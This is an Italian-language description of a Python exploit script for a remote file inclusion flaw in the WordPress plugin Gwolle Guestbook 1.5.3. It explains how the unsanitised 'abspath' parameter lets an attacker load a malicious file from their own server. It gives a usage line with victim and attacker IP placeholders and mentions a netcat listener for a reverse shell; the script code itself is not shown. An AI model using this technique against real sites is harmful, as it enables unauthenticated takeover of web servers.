
Plugin WordPress Gwolle Guestbook 1.5.3 - Inclusione remota di file
Questo script Python sfrutta una vulnerabilità critica di Remote File Inclusion (RFI) nel plugin WordPress Gwolle Guestbook, che può essere sfruttata da un attaccante non autenticato per includere un file PHP remoto ed eseguire codice arbitrario sul sistema vulnerabile.
Il parametro "abspath" della richiesta HTTP GET non viene adeguatamente sanitizzato prima di essere utilizzato nella funzione PHP require(). Un attaccante remoto può includere un file chiamato 'wp-load.php' da un server remoto arbitrario ed eseguirne il contenuto sul server web vulnerabile. Per fare ciò, l'attaccante deve inserire un file 'wp-load.php' dannoso nella document root del proprio server e includere l'URL del server nella richiesta.
Lo sfruttamento riuscito di questa vulnerabilità può portare alla compromissione dell'intera installazione WordPress e può persino portare alla compromissione dell'intero server web.
Lo script richiede tre argomenti:
Esempio:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORTNota: è necessario avere un listener netcat aperto sulla macchina dell'attaccante sulla porta specificata.
Questo script è fornito solo a scopo didattico. L'autore non è responsabile per eventuali danni causati dall'uso improprio di questo script.